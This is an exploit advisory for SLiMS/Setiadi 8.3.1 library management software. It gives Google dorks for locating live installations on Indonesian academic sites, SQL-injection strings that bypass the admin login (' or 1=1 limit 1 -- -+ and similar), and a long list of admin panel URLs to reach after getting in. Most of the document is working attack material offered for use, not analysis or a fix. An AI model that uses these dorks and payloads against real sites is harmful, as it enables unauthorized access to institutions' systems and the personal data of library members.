####################################################################

# Exploit Title : Slims CMS Akasia 8.3.1 Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/05/2019
# Vendor Homepage : slimsetd.id - slims.web.id
# Software Download Link : slims.web.id/goslims/?wpdmpro=slims-8-3-1-akasia
# Software Information Link : foss4lib.org/package/senayan-library-management-system-slims/release/8.3.1
# Software Version : 8.3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
intext:Template By Erwan Setyo Budi. Powered By SLiMS and ShapeBootstrap. site:ac.id
intext:Powered By SETIADI and ShapeBootstrap. site:ac.id
# Vulnerability Type : 
CWE-285 [ Improper Authorization ]
CWE-284 [ Improper Access Control ]
CWE-592 [ Authentication Bypass Issues ]
CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Setiadi is an automation system that serves to manage repository such as thesis and 
dissertation. Setiadi is built based on SLiMS (Senayan Library Management System).
Setiadi is an open source automation, licensed under GPL v3, built using PHP 
and MySQL database.

SENAYAN Library Management System (SLiMS) version 8 Codename Akasia
SLiMS is free open source software for library resources management 
(such as books, journals, digital document and other library materials) and
administration such as collection circulation, collection management, membership,
stock taking and many other else.

####################################################################

# Impact :
***********
The software does not restrict or incorrectly restricts access to a resource 
from an unauthorized actor.

The software does not perform or incorrectly performs an authorization check when 
an actor attempts to access a resource or perform an action.

When an actor claims to have a given identity, the software does not prove or 
insufficiently proves that the claim is correct.

Assuming a user with a given identity, authorization is the process of determining whether 
that user can access a given resource, based on the user's privileges and any permissions 
or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able 
to access data or perform actions that they should not be allowed to perform. 
This can lead to a wide range of problems, including information exposures, 
denial of service, and arbitrary code execution.

####################################################################

# Authentication Bypass / Improper Access Control / Improper Authorization Exploit :
**************************************************************************
Admin Panel Login Path :
************************
/index.php?p=login
/admin

Admin Username : 
admin
admin' --
'=''or'
' or 1=1 limit 1 -- -+
anything' OR 'x'='x

Admin Password : 
admin
admin' --
'=''or'
' or 1=1 limit 1 -- -+
anything' OR 'x'='x

Useable Admin Control Panel Links Exploits :
******************************************
/admin/modules/system/app_user.php?changecurrent=true&action=detail
/admin/index.php?mod=bibliography
/admin/modules/bibliography/index.php?action=detail
/admin/modules/bibliography/item.php
/admin/modules/bibliography/checkout_item.php
/admin/modules/bibliography/z3950sru.php
/admin/modules/bibliography/z3950.php
/admin/modules/bibliography/p2p.php
/admin/modules/bibliography/dl_print.php
/admin/modules/bibliography/item_barcode_generator.php
/admin/modules/bibliography/marcexport.php
/admin/modules/bibliography/marcimport.php
/admin/modules/bibliography/printed_card.php
/admin/modules/bibliography/export.php
/admin/modules/bibliography/import.php
/admin/modules/bibliography/item_export.php
/admin/modules/bibliography/item_import.php
/admin/index.php?mod=circulation
/admin/modules/circulation/index.php?action=start
/admin/modules/circulation/quick_return.php
/admin/modules/circulation/loan_rules.php
/admin/modules/reporting/customs/loan_history.php
/admin/modules/reporting/customs/overdued_list.php
/admin/modules/reporting/customs/reserve_list.php
/admin/index.php?mod=membership
/admin/modules/membership/index.php
/admin/modules/membership/index.php?action=detail
/admin/modules/membership/member_type.php
/admin/modules/membership/member_card_generator.php
/admin/modules/membership/export.php
/admin/modules/membership/import.php
/admin/index.php?mod=master_file
/admin/modules/master_file/index.php
/admin/modules/master_file/rda_cmc.php?type=content
/admin/modules/master_file/rda_cmc.php?type=media
/admin/modules/master_file/rda_cmc.php?type=carrier
/admin/modules/master_file/publisher.php
/admin/modules/master_file/supplier.php
/admin/modules/master_file/author.php
/admin/modules/master_file/topic.php
/admin/modules/master_file/location.php
/admin/modules/master_file/news_type.php
/admin/modules/master_file/place.php
/admin/modules/master_file/item_status.php
/admin/modules/master_file/coll_type.php
/admin/modules/master_file/doc_language.php
/admin/modules/master_file/label.php
/admin/modules/master_file/frequency.php
/admin/modules/master_file/p2pservers.php
/admin/modules/master_file/item_code_pattern.php
/admin/modules/master_file/author.php?type=orphaned
/admin/modules/master_file/topic.php?type=orphaned
/admin/modules/master_file/publisher.php?type=orphaned
/admin/modules/master_file/place.php?type=orphaned
/admin/index.php?mod=stock_take
/admin/modules/stock_take/index.php
/admin/modules/stock_take/init.php
/admin/modules/system/index.php
/admin/index.php?mod=system
/admin/modules/system/envinfo.php
/admin/modules/system/ucsetting.php
/admin/modules/system/theme.php
/admin/modules/system/content.php
/admin/modules/system/biblio_indexes.php
/admin/modules/system/module.php
/admin/modules/system/app_user.php
/admin/modules/system/user_group.php
/admin/modules/system/shortcut.php
/admin/modules/system/holiday.php
/admin/modules/system/barcode_generator.php
/admin/modules/system/sys_log.php
/admin/modules/system/backup.php
/admin/index.php?mod=reporting
/admin/modules/reporting/index.php
/admin/modules/reporting/loan_report.php
/admin/modules/reporting/member_report.php
/admin/modules/reporting/customs/class_recap.php
/admin/modules/reporting/customs/titles_list.php
/admin/modules/reporting/customs/item_titles_list.php
/admin/modules/reporting/customs/item_usage.php
/admin/modules/reporting/customs/loan_by_class.php
/admin/modules/reporting/customs/member_list.php
/admin/modules/reporting/customs/member_loan_list.php
/admin/modules/reporting/customs/loan_history.php
/admin/modules/reporting/customs/due_date_warning.php
/admin/modules/reporting/customs/overdued_list.php
/admin/modules/reporting/customs/staff_act.php
/admin/modules/reporting/customs/visitor_report.php
/admin/modules/reporting/customs/visitor_report_day.php
/admin/index.php?mod=chat
/admin/index.php?mod=serial_control
/admin/modules/serial_control/index.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################